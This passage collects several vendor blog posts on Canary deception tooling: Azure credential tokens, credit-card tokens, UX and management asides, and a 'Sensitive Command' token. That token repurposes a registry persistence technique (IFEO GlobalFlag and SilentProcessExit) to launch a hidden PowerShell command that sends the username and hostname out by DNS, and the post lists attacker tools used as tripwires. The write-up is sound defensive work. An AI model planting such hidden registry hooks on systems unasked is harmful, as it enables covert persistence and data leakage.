    Mounting the file share places a Canary right in the path of any attacker.

    No matter where you work from, a Canary will be nearby to alert you to any undesired activity. For a total of 3 clicks and 4 minutes you will know when it matters. For more details head over to our knowledge base article.

  • Canarytokens.org welcomes Azure Login Certificate Token


    The AWS API key Canarytoken is a perennial favourite on Canarytokens.org, and we’ve heard requests for a similar token for Azure.

    In this blog post, we introduce the Azure Login Certificate Token (aka the Azure Token) to Canarytokens.org.¹

    As with all tokens, you can sprinkle Azure tokens throughout your environment and receive high fidelity notifications whenever they’re used. Place one on your CTO’s laptop, or on every server in your fleet. When attackers breach that laptop or those servers, they’ll search for useful credentials and discover the Azure tokens. Such juicy credentials are too tempting to ignore, and when they try them, you’ll be alerted to the compromise.

    Why is the Azure Login Certificate Token useful?

    Azure is the second largest provider of cloud infrastructure services in the world. Hundreds of thousands of organizations use Azure Cloud to run their infrastructure. Thanks to the growing Infrastructure as Code movement, many of them are bound to use programmatic command line access to manage their infrastructure.

    Attackers know this too.

    Searching for Azure credentials is almost standard post-exploitation behaviour, and finding login certificates is an attacker’s dream. This token turns that around. One alert, when it matters.

    Are Azure tokens only useful to Azure customers? Of course not; Canarytokens are useful across your actual vendor lines. You don’t need to be an AWS customer to deploy actionable and useful AWS API Key Canarytokens, and you don’t need to be an Azure customer to find Azure tokens useful for detecting compromises in your network.

    Attackers who find them won’t decide not to use them because they really don’t think you are an Azure shop. They will lick their chops while testing access (and in doing so will tip their hands).

    Creating an Azure Login Certificate Token

    It’s dead simple: head over to canarytokens.org, our public Canarytokens service:

    1. Select ‘Azure Login Certificate’ from the drop-down list.
    2. Enter an email and a token reminder. We use the email address to notify you when the token is tripped. The reminder you choose will be attached to the alert. (Choose a unique reminder! Nothing sucks more than knowing a token is tripped, but being unsure where you left it.) A good reminder is something like “Azure Token deployed to c:\Users\Administrator\ on DC-LON-02”, which clearly highlights where you placed it.
    3. Click on “Create my Canarytoken”:
    4. Congratulations, your new Azure token is ready to be deployed! The output displayed can either be copied into a new file in the place you want to deploy the token, or you can download a file and move it into place. Don’t forget to delete any intermediate copies of the data.

    Testing the Azure token

    On Linux (with the az tool installed), the token can be triggered simply by running:

    $ az login --service-principal -u <app-id> -p <password-or-cert> --tenant <tenant>

    with the relevant parameters updated using the information from the token. As an example:

    Within 5 to 10 minutes you’ll get an alert notification indicating that the credentials have been used:

    Where to deploy the Azure Token

    Place the Azure token config file alongside the certificate in a juicy place for potential attackers to find.

    Most systems have a ~/.azure folder (much like the ~/.aws or ~/.ssh) and you can place the config file and certificate there.

    Behind the scenes

    The route followed is similar to what we do with AWS Key Canarytokens. In short, we pre-generate credentials programmatically into a pool of available credentials because each takes a few seconds to create. These are later allocated to a user when they request a new Azure Canarytoken. We then monitor the usage logs of the Azure accounts in which the credentials were created, and if credentials were used we send the alert. 
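    The pooling approach can be sketched roughly like this (the class and method names are our own invention for illustration, not the actual Canarytokens code):

```python
import itertools
import queue

class CredentialPool:
    """Pre-generate slow-to-create credentials so token requests are instant."""

    def __init__(self, factory, size: int = 10):
        self._factory = factory   # the slow "create a credential in Azure" call
        self._pool = queue.Queue()
        self.refill(size)         # filled ahead of time, e.g. by a scheduled job

    def refill(self, count: int) -> None:
        for _ in range(count):
            self._pool.put(self._factory())

    def allocate(self):
        """Hand a ready-made credential to a new token request."""
        return self._pool.get_nowait()
```

    A background job keeps the pool topped up, so the token-creation path never has to wait the few seconds Azure takes to mint a credential.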

    Wrapping up

    The new Azure Canarytoken gives Azure customers (and everyone else) a simple new way to detect breaches, by deploying Azure credentials at no risk to themselves in places attackers would typically find them. 

    Azure tokens are currently live on Canarytokens.org, and (as always) are completely free.

    They take just minutes to create and deploy (even if you are a slow typist). Try them. They are totally worth the time.


    ¹ Commercial customers have had this token for a little while now.

  • Swipe right on our new credit card tokens!


    Detect breaches with Canary credit cards!


    Today we’re releasing a new Canarytoken type: actual credit cards! 

    1. Head over to canarytokens.org;
    2. We give you a valid credit card (number, expiration, and CVC);
    3. If anyone ever attempts to use that card you’ll be notified.

    We recommend placing one anywhere you store payment information. If you ever get an alert on it, you know that data-store has been compromised.


    Canaries generally aim to look like something an attacker would want to interact with. It’s why our mantra has always been that Canaries should look valuable (instead of just vulnerable). Historically, these have been network services or juicy repositories of sensitive information that encourage attackers to advertise their presence as they move through the network looking for firm footholds. Canarytokens expand on that to include files or data that reliably trigger alerts when accessed.

    Our new credit card tokens fit this bill perfectly. We give you a perfectly valid credit card. You store it somewhere and if it’s ever used, we will let you know.

    Mix it in with your store of saved card data or on payment gateways. An attacker who plans to test the cards (as they normally do when obtaining them) or attackers who try to use them will immediately advertise their presence, and your response team can spring into action.

    Using the token

    Using this new token is easy, just head over to Canarytokens.org, and select Credit Card token from the dropdown.

    Then enter the email address or webhook URL where you want to be notified when an attempted transaction occurs (we never use this to spam you or sell you things, it’s only to notify you when this card is used):

    Hit “Create my Canarytoken”, and after a few seconds we will give you a set of unique, valid (real) credit card information, complete with generated name, card number, expiration date, and CVC:

    You can also download this information as a CSV to programmatically import into your storage location. 
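    If you take the CSV route, importing it takes only a few lines. A sketch in Python (the column names here are hypothetical; check the header of the actual downloaded file):

```python
import csv
import io

def load_card_token(csv_text: str) -> dict:
    """Parse the downloaded Canarytoken CSV into a dict ready for
    insertion into a payment data-store.

    Column names are assumed for illustration, not guaranteed.
    """
    row = next(csv.DictReader(io.StringIO(csv_text)))
    return {
        "name": row["name"],
        "number": row["card_number"],
        "expiry": row["expiration"],
        "cvc": row["cvc"],
    }
```

    From there, the dict can be inserted into whichever table or store holds your real card records, so the token blends in with legitimate data.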

    Some places we recommend putting these include:

    1. Databases where you store customer payment information
    2. Email inboxes (PSTs) to get an alert on email compromise
    3. If you’re concerned about an insider, put one or two in a Word document on an internal file share in a file called something like: “travel payment info.docx”

    Take a deep breath and relax, the hard work is all done!

    If someone does try to use the card, the transaction will fail, and you’ll get an alert like this in your email with the merchant name, the amount of the transaction, and the note you put in when you created the account:

    This is a high quality alert–someone is actively trying to monetize data that they should only have been able to get from wherever you put this token. Like all other well deployed Canarytokens, it also self identifies. You can drop one in each payment store or database and forget about it (at least until the card expires). When you get the alert, you will know immediately that it’s the credit card from the Lisbon DB that was used, and you know immediately where to start investigating.

    The chances of a false positive for this alert are close to nil, and historically it’s been clear that the quicker you can react to a compromise, the better you can contain the splash damage of the event.

    Conspicuous deception

    Canaries and Canarytokens have caught red-teamers, fast-fingered insiders and full-blown attackers all over the world. We expected them to when we started Canary. What we didn’t quite expect was the deterrence factor once attackers became aware of their presence. Last year, during an external red-team engagement, we placed attackers on a presentation laptop in our conference room. The attackers, knowing our proclivities, were afraid to move beyond that system, almost paralyzed into inaction for days. This matches feedback we’ve received both privately and publicly for years:

    We’ve been noodling on this a little and we’re calling it conspicuous deception: letting people know you are running Canaries or Canarytokens in order to alter their behavior.

    We think the credit card Canarytoken is a good example of this.

    If this token has the impact that we hope, savvy attackers, or the buyers of their stolen dumps, will have to start considering the risk of a test swipe destroying the entire set. As merchants and their payment processors leverage this new visibility, they can respond to a test swipe event much more quickly, and with better understanding of the potential splash damage of a breach. Typically credit card companies and banks identify breaches through analysing multiple reports of fraud looking for commonalities in their transactions (such as physical charge locations, websites where the card was used, or payment processors that were involved). This takes time for sufficient fraud reports to flow in before the breached location can be identified. This token allows for near instantaneous identification of a breach.

    For low-tier attackers that continue to breach and steal cards without changing their tactics, this token will reduce their ability to monetize and commit fraud. Savvy attackers may start looking for patterns in the bank identification numbers (BINs) that we issue, and proactively deleting or excluding them from their dumps. For this reason we are in discussions with a number of banks to onboard their BINs to the system too, further mixing in legitimate cards with tokens. 

    It’s a compelling argument: “Would you like attackers to first remove your bank’s cards from dumps they steal?” 

    The more BINs we can cover with tokens, the more deterrence the token provides – even to organizations that have not deployed these tokens to their environment. This is a benefit of conspicuous deception, the possibility of the dump being tripwired provides protection even if it isn’t actually seeded with tripwires.


    Canaries and Canarytokens are powerful tools that are easily deployed. Recently a security researcher, Daniel Hückman, discovered that AWS Canarytokens he had stored in his CircleCI environment were being improperly used.

    The credit card Canarytoken gives you more ways to monitor your environment, as well as the exposure of your data held by third parties. Credit card fraud amounts to almost $40B per year worldwide; we hope that faster breach response times will help make a (small) dent in that figure.

    We think that our Canarytokens offer great protection and detection capabilities while being easy to deploy and cost-effective (free!). By giving them away for free, we introduce a risk for attackers trying to monetize their access: from AWS credentials that may provide access to the crown jewels to an Excel document called “2022 Taxes”, attackers need to step a little more carefully.

    We hope you’re as excited about this new token as we are (and that it never has to alert you).
    Ps. if you are a bank/card-issuer that wants to work with us to help protect your customers too please drop us a note at research@thinkst.com

  • Seasonal themes, delighting users & small UX touches


    We’ve written before about the effort we put into UX choices in our app. We don’t consider problems solved just because we kicked out a feature in its general vicinity, and we are super strong believers in “small things done well”.

    This came to the fore again recently when we added a “seasonal theme” to customer Consoles, and I figured it was worth a brief post to examine our thinking around (even) short-term UX.

    In our early days we’d give a brief nod to seasonal changes by slightly altering our Twitter avatar.

    Having an actual legit designer on the team gives us significantly more leeway, and so “Console Seasonal Themes” was born. The plan is to (very infrequently) add small non-obtrusive splashes within the customer Console when a reasonable opportunity arises. These splashes should be subtle and hopefully bring a quick smile to someone’s face as they go about their day.

    Halloween was the first opportunity to take it for a spin, and Blake threw up a few concepts. We wanted to make sure that the theme never came close to interfering with anyone’s workflows, so we ended up with two main areas to decorate: the Console header, and the Canary logo. He chose to animate ghostly birds in the header, and the logo got an appropriately spooky makeover.

    It was beautiful but before unleashing it on all customer Consoles, Nick felt strongly that we should also include a button to disable the animation/effect.

    We know that some customers prefer to disable even minor window animations in the UI, so it was the right call. I was originally ok with simply feature-flagging the effect, which would allow the CS/support teams to disable it if a user complained, but Nick correctly pointed out that this was making the customer do too much to switch off something they never asked for.

    So he added a toggle under settings to disable the animation:

    This seems like a reasonable place to ship it, but there is still a flaw: how does a user who signs in know that the animation can be turned off in settings? If they don’t know the toggle is there, it might as well not be.

    So the team next tried adding a small unobtrusive button on the actual header.

    The generic ℹ️ button looked like a candidate for replacement. We went through a few quick variations and settled on a relatable jack-o’-lantern:

    A button that only shows up as you approach the click-zone is a pattern we use elsewhere in the app to keep the interface clean while offering needed functionality, but once more the problem would be: how does a user know they should go there to float up the button?

    Instead of ever making the button completely disappear, we opted to use colour and a slight wiggle to bring the user’s eye to it:

    At this point, one would be tempted once more to ship it, but if we are being completely honest, the current jack-o’-button, even with its little wiggle, could slip by as part of the animation. It isn’t immediately obvious (unless you’ve spent as much time as we have looking at it) that the lantern is actually a button.

    So what we wanted was a button that didn’t look like a button but that people would know was a button, and we wanted it well hidden, but not too well hidden. These kinds of seemingly opposing constraints aren’t atypical in UX. Folks can think in terms of trade-offs or middle-ground, but with enough effort, we usually end up with a better result than just meeting in the middle.

    The final form, then, was the wiggling, colour-changing jack-o’-lantern, but with a quick flash when the page loads to let you know that something was under there. It didn’t matter if the text escaped too quickly, because your natural reaction would be to hover in the area (which could then activate the button).

    Ultimately, it was worth it. We enjoyed making it happen and customers (at least some of them¹) found it delightful!


    ¹ 153 Consoles disabled the effect (which is less than 10% of those it ran on). Counter-intuitively, we count that as a win too, since we gave customers that option and they clearly found the button!

  • Company Lessons (from YouTube’s “Hot Ones”)

    I recently discovered “Hot Ones” on YouTube. If you haven’t seen any of the episodes, you should (because they really are fantastic). This isn’t really a controversial opinion: their YouTube channel has 12 million subscribers and almost 2.6 billion views.

    The show has a few lessons that I think are worth noticing/stealing. I’ll discuss 3 of them here (even if they are kinda random).

    1) Genuine Warmth

    One would expect the show to lean on a kinda gotcha-slapstick routine: we all laugh at celebs suffering, but that isn’t really how it goes. The host (Sean Evans) suffers every moment with his guests and is super empathetic throughout. It’s not adversarial at all and guests reaching the end have a kind of shared bond with the host (and the audience).

    Lots of companies are polite to customers (in front of them) but snicker about them behind their backs. Everyone recognizes the meme of tech-support insulting “idiot users” who just don’t get it. Even if this stuff isn’t said directly, it can’t really be hidden. It eventually seeps out of an organization’s pores.

    This is one of the reasons we focus so hard internally on customer love. We aren’t just doing it to be polite. We know that our customers could have bought anything, but they bought us. We deeply want them to win and we deeply want them to get it. This also can’t be hidden (and also seeps out through our pores).

    Putting in the work (off camera)

    Sean Evans is an incredible interviewer. There are a bunch of compilations online of guests being impressed by the depth of his questions.

    Part of this is because the hot-sauce takes out guests’ ability to answer:

    But the questions are definitely deep and super well researched:

    Interviews in the past few years explain how they get this right:

    Between episodes is when the real work begins…

    Once a guest is booked, the three-person research team goes to work. “There’s a lot of armchair psychology that goes into the show,” says Schonberger. In practice, that means Evans’ brother — Gavin, who lives in Chicago — will compile a dossier. “He’ll basically read like every article there is, every profile, every Reddit AMA, like reading everything that he can find and create,” says Schonberger, noting that they can run to something like 30 pages long. “It’s almost like we’ve created our own Wikipedia template that’s suited to the show.”

    Sean, on the other hand, does the videos. He’ll consume 12-24 hours of clips, looking for breadcrumbs. …

    Schonberger does some of the podcasts, which means he listens to everything he can get his hands on. It’s the same idea as with the videos, except people are usually less guarded on podcast appearances than they are during video shoots. Then they compare notes, and Evans and Schonberger come up with ten topics to hit during the interview.

    — The Verge

    We’ve been championing this line of thinking forever. Boxers don’t win their fights in the ring. It’s why we push so much for putting in the miles. It’s why we spend so much effort working on the tiny details that most people won’t see. It’s because the results are worth it (even if most people don’t know what’s behind it).

    Following a Script (This is an unusual / subtle one)

    When a new person joins us in customer-success/pre-sales we teach them about Canary, why we build it, and how we demo it. One personality archetype quickly decides that they will learn the product but will wing it for demos. They seem slightly surprised that we stay close to a fixed format even if we have been demo’ing Canary (or building it) for years. Following a script almost seems like an insult to them: they have a mic and they are smart and they can show off the newest features.

    With all the praise (in the previous point) for Sean, and now 18 seasons of the show under his belt, it’s worth checking out this quick super cut of guests starting and then clearing the final wing:

    Once it locks in, he almost never deviates from the script. We’ve already established that he isn’t lazy, so why does he do it that way?

    The same reason we do. Because it works. There are places to customize, and places to go deep but in key areas, it runs on rails. The script works and they’ve stuck with it for 18 seasons.

    We understand why some new people don’t want to demo close to the original script: they are smart enough and skilful enough to not need guide-rails. It’s also human nature that after you’ve done a demo n-times, you want to do the n+1th differently. 

    When you’ve shown 10 people the basic features of the system, you somehow expect that the 11th person needs to see the advanced features because you already spoke about the basics 10 times, but this is a fallacy. The 11th person is also seeing the product for the first time and they may smile through the advanced features – but you aren’t giving them the same experience you gave the first 10, and there’s a good chance you leave them confused.

    The show is worth watching – you should check it out…

    [All this was to allow me to watch tons of YouTube videos calling it management-research]

  • Sensitive Command Token – So much offense in my defense


    Many people have pointed out that there are a handful of commands that are overwhelmingly run by attackers on compromised hosts (and seldom ever by regular users/usage). Reliably alerting when a user on your code-sign server runs whoami.exe can mean the difference between catching a compromise in week-1 (before the attackers dig in) and learning about the attack on CNN.

    Introducing our new Sensitive Command Canarytoken.

    This quick/simple Canarytoken alerts you any time your chosen command is executed on a host.

    For example: This token creates registry keys to alert you anytime whoami.exe runs on a host.

    If an attacker lands on the server and runs whoami.exe (as most attackers almost instinctively do) they get the results they expect.

    And you get an alert to let you know that something bad is afoot.

    Why this token?

    In nearly every ransomware report, we can see attackers running a series of predictable commands on endpoints.
    Some of those commands are almost never run by regular users through regular usage. This means that they become high quality markers of “badness”.
    Wouldn’t it be great to get an alert the moment someone runs WMIC on your code-signing server? Or the moment someone runs whoami.exe on your SQL-Server? Many organizations will use EDR (Endpoint Detection and Response) tools to do this. However, these complex telemetry streams and detection logic may not be available to small organizations, may not be comprehensively deployed, and often require specific configuration changes to alert on these invocations.
    We want to know, and we want the setup to be dead-simple.

    tl;dr – Just show me the token

    If you visit https://canarytokens.org and view the list of available tokens, you will notice a new Canarytoken type: “Sensitive command token”
    Choose the Sensitive command token.
    Next, like other Canarytoken configurations, we add some quick details:
    [1] Where to send the alert, (email or webhook, or both);
    [2] A reminder note, that will help you react when you receive an alert from this token;
    [3] Choose the process that you want to monitor execution for (e.g., wmic.exe, whoami.exe, klist.exe, nltest.exe).
    The Canarytoken server will create a .reg file for you to download and import onto a Windows 10, or Windows 11 system (or use GPO to deploy across multiple systems).
    Once you have downloaded the .reg file, you can import this to the system (or systems) you want to monitor.

    reg import

    Remember this will require local Administrator permissions.

    That’s it! If a user on this host ever runs that (sensitive) command, you will receive an alert!
    It’s worth noting that this Canarytoken does not impede or alter the original command in any way; it simply sends you a near real-time alert that someone has executed our tripwire.
    In the alert you will see the details of the time of the alert, the user that executed the command, and the computer name the command was executed from.
    A subtle benefit of how this token is designed allows you to deploy the same token on multiple machines without making any changes. Running reg import across a host of machines will tripwire them all, and when an attacker runs her command on any one of them, you will know.
    There you go!
    We can now create a Canarytoken to alert us on Sensitive Commands that execute.
    These commands may be sensitive due to the fact that they are rare, used by attackers, or are sensitive to your organization. How you choose to pick the executable is up to you.
    Bonus: the executable does not need to be present on the system. Suppose your organization never uses adfind.exe.  You could add this tripwire, so that if someone ever downloaded that to your system and executed it you would be notified.
    Additionally, you sometimes can’t run AV/EDR on certain machines, or on 3rd-party systems that won’t allow you to install software; here you can still monitor an executable (or five).
    That is all you need to get started using this new Canarytoken. If you would like to learn more about the architecture and mechanics under the hood: continue reading.

    Under the hood

    Problem Statement:

    We wanted to see if we could find a way to generate an alert to our Console when a suspicious command is executed on a system, without interfering with the original command execution.
    The best candidate command for this alert is one that is rare, short lived, and used by attackers.
    In short, if you want to receive an alert if someone runs wmic.exe on a workstation, this may be the Canarytoken for you.  This token creates a .reg file with three registry entries that you can import to the system. You will need Windows 10 or 11, and Administrator access to the systems you want to add this to.

    Token Architecture:

    Our team spent a number of cycles trying various experiments and approaches to generating an alert based on process execution: from doskey, to WMI, to performance monitoring. We settled on an older pentesting persistence trick that, in the end, met all our requirements.


    In his blog post “Persistence using GlobalFlags in Image File Execution Options”, Oddvar details how to persist in the registry and execute a command on a Windows system that runs in the background. This technique meets our requirements exactly. We needed a tripwire that would run in the background, not interfere with the original process, and allow us to make a custom callback/alert over DNS to alert a system administrator, or security team, that a suspicious command had been executed on the system.
    (We have also seen a debugger variation of this technique used by high profile attacks as well.)
    “The attackers achieved this by having the SolarWinds process create an Image File Execution Options”
    We will repurpose the mechanics of this attacker technique and turn it into a defender tripwire!
    Oddvar demonstrated his technique to establish persistence and run an arbitrary executable; we will use it to reliably generate a remote alert.
    This Canarytoken does not add any new executable to your system thanks to the wonders of Oddvar’s technique, built-in tools and the Canarytoken server. We will be using Microsoft’s built-in SilentProcessExit monitoring, documented here:
    The specific registry settings we are interested in:
    Image File Execution Options\{ProcessName}
    You will see in the registry output above that we set this to the value 0x200. You may need to ensure that the process you wish to monitor isn’t impacted by this setting.
    Next we set the ReportingMode to 0x1.
    “When silent exit is detected, the monitor process (specified in the Monitor Process box) is launched.”


    The bulk of the work for this alert is what we configure in the MonitorProcess value.
    Let’s break down the command to trigger this alert:
    "MonitorProcess"="cmd.exe /c start /min powershell.exe -windowstyle hidden -command \"$($u=$(\\\"u$env:username\\\" -replace('[^\\x00-\\x7f]|\\s', ''))[0..63] -join '';$c=$(\\\"c$env:computername\\\" -replace('[^\\x00-\\x7f]|\\s', ''));Resolve-DnsName -Name \\\"$c.UN.$u.CMD.g6jjwnaukbfddgz51kh8tacdc.canarytokens.com\\\")\""
    The various \\\ sequences are to ensure proper escaping for both the command to run and to import into the registry.
    First we call “cmd.exe /c start /min”. This trick makes the execution of our alert appear to run in the background: even with -windowstyle hidden set, PowerShell would briefly flash a window, which wasn’t acceptable for our goals. We also added code to strip non-ASCII characters and whitespace, to ensure the alert data can be passed over a DNS query.
    Next we run a PowerShell command to resolve our Canarytoken DNS name.
    We can leverage our ability to encode data into the DNS request. This is documented here
    Our lookup captures computername.username.token. Why PowerShell? We had some interesting collisions when trying to use the %computername% environment variable in, say, an nslookup command, because MonitorProcess parses the registry value and uses %c to report a status code. After a few iterations and experiments, we found PowerShell the easiest way to collect the variables we need and add them to the alert.
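    For readability, here is the same alert command with the registry escaping removed (this is the logic of the one-liner above restated, not new functionality):

    ```powershell
    # Strip non-ASCII characters and whitespace; cap the username portion at 64 chars
    $u = $("u$env:username" -replace('[^\x00-\x7f]|\s', ''))[0..63] -join ''
    $c = $("c$env:computername" -replace('[^\x00-\x7f]|\s', ''))
    # The DNS lookup itself carries the alert data to the Canarytoken server
    Resolve-DnsName -Name "$c.UN.$u.CMD.g6jjwnaukbfddgz51kh8tacdc.canarytokens.com"
    ```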


    • Installing the .reg file requires admin privileges;
    • Selecting the wrong “sensitive executable” will yield false-positive alerts;
    • Hostname and Username are sent in clear-text in the alert;
    • Process level alert: we only see that the process was executed, this approach does not give us command line granularity;
    • Upon installation, these commands may look like attacker commands (the installation, not the alert itself); this is because we are repurposing an attacker trick;
    • This alerts on all executable matches for the filename. If you need further refinement, you can customize this by setting the FilterFullPath registry key;
    • Image architecture: these keys were tested on x64. You may need to customize the settings if you are hoping to alert on x86/32-bit execution; C:\Windows\SysWOW64\whoami.exe may evade the alert. Again, something to be aware of if you are using these for critical areas;
    • This alert won’t catch a renamed binary, since it triggers on the process name.
    If you need a tool that alerts on process execution by OriginalFilename, location and command line, there are several to choose from. We just wanted to call that out, so you are aware of some of the limitations of these types of alerts.
    We do also see utility for teams to set tripwires for executables they never wish to see executing. Suppose we want to set a tripwire for mimikatz.exe.  We can create the registry key, even though mimikatz.exe is not present on the system.  Then if anyone ever executes a file with that name, we will receive an alert!  You may also extend this to internal tools or executables as well.
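    As a sketch, creating such a tripwire for mimikatz.exe from an elevated prompt could be as simple as two reg.exe commands (the MonitorProcess value, omitted here, would be the same escaped alert command shown earlier):

    ```
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mimikatz.exe" /v GlobalFlag /t REG_DWORD /d 0x200 /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\mimikatz.exe" /v ReportingMode /t REG_DWORD /d 0x1 /f
    ```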

    Choosing a binary to monitor:

    Candidate sensitive commands:
    • Short-lived: exits quickly
    • Low frequency
    • Low execution prevalence
    • Indicative of suspicious or unusual activity
    Each organization will need to look at command frequency, review various threat reports and make that decision. If you need to disable a Canarytoken like this, you could for example set the Image File Execution Options\{ProcessName} GlobalFlag value to 0x0, then set it back to 0x200 if need be.
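    For instance, a hypothetical “off switch” (again assuming whoami.exe as the monitored process) is a one-value change that leaves the other keys intact:

    ```reg
    Windows Registry Editor Version 5.00

    ; Disable the tripwire without deleting the keys; re-import with dword:00000200 to re-arm
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\whoami.exe]
    "GlobalFlag"=dword:00000000
    ```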
    For example: we’ve seen schtasks.exe leveraged in nearly all ransomware attacks. At first blush this binary seems like an ideal candidate to token, but it turns out that schtasks runs frequently in the background, so it doesn’t meet the low-frequency criterion.
    Additionally, Windows will create an event in the Application log when these events occur, giving teams further data to investigate. The only requirement to record these events is that the Image File Execution Options\{ProcessName} GlobalFlag value be set to 0x200.
    For those interested in additional details, EventID 3000 in the Windows Application log indicates that process exit monitoring has occurred. Teams that want a lightweight process-monitoring record can simply set GlobalFlag to 0x200 and observe over time how frequently the process runs and whether it runs and ends quickly. A process with this flag unexpectedly set may also be a good indicator of compromise for teams not expecting to see it.
    As an example, below is a quick way to search for these events and extract the usernames.
    $Events = Get-EventLog -LogName Application -InstanceId 3000 -Source "Microsoft-Windows-ProcessExitMonitor"
    $Events | %{ $_.Username }


    We looked at creating a new Canarytoken type that allows us to receive an alert when we specify an executable name that we want to watch for. We can do this by adding three registry keys and a PowerShell command to trigger a DNS lookup for us. We overload the DNS request with sufficient data to generate a meaningful alert for defenders. (We wrap all of this up in one simple .reg file import).
    We discussed some of the advantages and disadvantages of this approach. We are able to do this by leveraging the alerting pipeline that you have perhaps already used. If you would like to customize these tokens, you certainly can (and you can always run your own custom version of the free Canarytoken server; see the GitHub repo here: https://github.com/thinkst/canarytokens).
    Thank you for taking the time to read, and we welcome feedback on ways to improve and refine this new Sensitive command Canarytoken. Thanks again to the Applied Research team at Thinkst for all the testing and feedback to help us bring an idea forward that may prove helpful.


  • Canaries as Network Motion Sensors



    This post is the first in a series by Canary customers where they detail how they integrated Canaries and Canarytokens into their security practice. This series hopes to showcase how organizations of varying sizes and structures deployed and acted on alerts to improve the security of their networks. Casey Smith recently joined Thinkst Labs, today he’s sharing his experiences with Canaries and Canarytokens from his previous role as a customer.


    Prior to joining Thinkst, I worked for a number of years as the principal analyst on a security team at an organization of ~3500 people with a highly regulated security practice. Our team was responsible for several systems: email, web applications, proxy server, host-based EDR, application control, and security analytics, as well as incident response, internal testing and penetration testing. I would consider ours a fairly mature security team, with lots of tools, software, and telemetry to inform our security response. We found that Canaries detected activity that our other tooling and telemetry did not.

    Some of these examples have been modified slightly to avoid disclosure of certain internal details.

    Our team prioritized visibility, followed by detection, then prevention: we can’t defend what we cannot see or detect. This philosophy helped our team gain great insight into our network, systems and applications. EDR, for example, would allow our team to search for any host and any process that makes a DNS request. We could then correlate that with other systems to react to unauthorized or suspicious access. We still found incredible utility in Canaries in these cases, and they come at a much lower cost than many of the other tools we purchased and deployed. We were able to leverage Canaries to detect both internal and external attacks.

    While no defense is perfect, this model informed our approach, along with a tight feedback cycle between detection and prevention.

    Some questions we constantly tried to ask of ourselves:

    1. How do we know this tool is working?
    2. Have we tested this tool?
    3. How do we know if an attacker is moving around in our network?
    4. What tools work to detect already compromised systems, and lateral movement?

    Below is a diagram of Mandiant’s standard intrusion model, in which attackers traverse from left to right; I’ve annotated it with where we thought about inserting Canaries for detection.

    Once an attacker gains initial access, they often do not know where they are. They have to discover and enumerate services and targets, find credentials, or elevate privileges. In essence they bump around, and this can be a defender advantage. This can be done in a number of ways, local and remote:

    1. Port Scanning
    2. Active Directory Enumeration
    3. Internal Sites, SharePoint, Confluence
    4. Network Shares, Documents
    5. Local accounts, Local Privilege escalation
    6. Exploits, Vulnerable services, Misconfigurations (Windows Services, etc.)

    It is to the defender’s advantage to shape the environment for the attacker early on. What we want to do is present some tempting targets and have the attacker attempt access. If they trigger an alert, this tipoff should be enough for us to investigate further. Tempting targets can be files (Canarytokens) or network services (Canaries). This blog seeks to share some real-world approaches for creating those targets, as well as challenges and opportunities we faced. Below we explore four scenarios in detail:

    1. SSH Detection on Guest Wireless
    2. Cyber Insurance Documents – CanaryTokens
    3. The Alert that should never happen
    4. Log4J Zero Day Detection, Remediation

    SSH Detection on Guest Wireless

    Like many corporate offices, we offered free guest Wi-Fi to visitors. At the time there were few controls and little monitoring there, beyond an Acceptable Use Policy. We decided this would be a great place to see if anyone was attempting attacks against our exposed guest Wi-Fi service; we could then detect and correlate attacks across multiple locations. We set up a physical Canary in our guest wireless VLAN. It took us about two weeks from the time we decided to deploy to get the necessary approvals and coordination, attestation and validation, etc. This will vary from organization to organization. Given the way our Wi-Fi was configured, we put the bird in the first VLAN just past the Access Point: in our configuration, Access Points prevent one Wi-Fi guest from sending packets to another, so the natural choice was to place the Canary in a VLAN that was accessible from any Wi-Fi guest. Finally we had the bird in place. Our team deployed a Linux profile with SSH, web server, and port scan detection. We tested the alerting infrastructure with our integrations to ensure the analysts would be ready. Once this was validated, the tripwire was set and we waited. It did not take very long for an alert to fire.

    It took just a few days before we received our first alert on port scanning and SSH attempts from the Wi-Fi Canary. We immediately started working our Incident Response process to validate that the alert was legitimate. Even when an alert is a false positive, it has been my experience that teams learn by running it to ground, which helps further tune and improve. Typical alert volumes (even without Canaries) would vary week to week, but on average the team would do a complete investigation on anywhere from 5-10 alerts per week, on the low end. These ranged from malicious email that bypassed our spam filtering, to endpoint alerts on suspicious files and suspicious URLs visited. In almost every case, even if the alert was a false positive, the investigating analyst learned more about the log sources and gained experience querying them. This also allowed us to create documentation and surface any gaps or places where we hit a dead end in an investigation.

    Once we determined the alert was valid, we reached out to the Network team for any indicators, logs or other data on the connected attacking host. Our alert provided three dimensions: a timestamp, a source IP address, and the username/password attempted. We wanted to research any and all activity for that host as far back as we could. To our delight, the Network team had immense insight into the Wi-Fi. They were able to present complete logs to validate the alert and also provide details of where the attacking device was in the building!

    For one more example of how, see this blog.

    It looked something like this:

    We wrapped up our investigation and dealt with the rogue host that had:

    1. Scanned our Guest Wi-Fi, and
    2. Attempted an unauthorized SSH login.

    This was our first real win with a Canary detection, and word began to spread within the organization that we had some pretty exceptional tools. That reputation can be helpful; in reality, it was good testing and teamwork. Security teams never investigate in isolation: they require close coordination with other teams, such as web administrators, networking teams, and endpoint teams. This incident helped reinforce our classification of these Canaries as “Network Motion Sensors”. We want to know when someone is attempting to move around on our network. Canaries may extend the range and reach of your detection into places where you cannot install software on endpoints: conference room scheduling panels, IoT/ICS segments, or other sensitive segments.

    Cyber Insurance Documents – CanaryTokens

    While reading recent public Ransomware reports, we learned that some Ransomware crews were reading Cyber Insurance Policies and targeting those organizations for payments.

    (See this story for example)

    So we decided that these policy documents were a prime candidate for Canarytokens. Canarytokens (for customers) allow you to upload internal documents and tokenize them.

    We placed a few tokenized policies alongside real policies in a read-only global share within the organization. It didn’t take long before the alert fired and we caught an unauthorized read of these files.

    When we built the alert, it had context on who was authorized within the organization to read these documents. If anyone else attempted to read them, the security team was to follow a rapid escalation route to triage the alert. And then it happened: an unauthorized attempt to read these files! We were then able to use the EDR tool to review the activity of the user and endpoint that had opened the documents.

    This was a great win for catching unauthorized document access. Some teams will argue that the same events could be captured with Windows alerting and logs, and while true, Canarytokens in well-placed Word files provided faster detection and validation.

    Alerts that should never happen

    Like most companies, we had some segments that were highly protected and that we were fairly confident would never be reached. For completeness, we decided to create some fake documentation on an internal web page, then deployed some executables and DLLs along with fake instructions on usage and access. We hoped this alert would never go off.

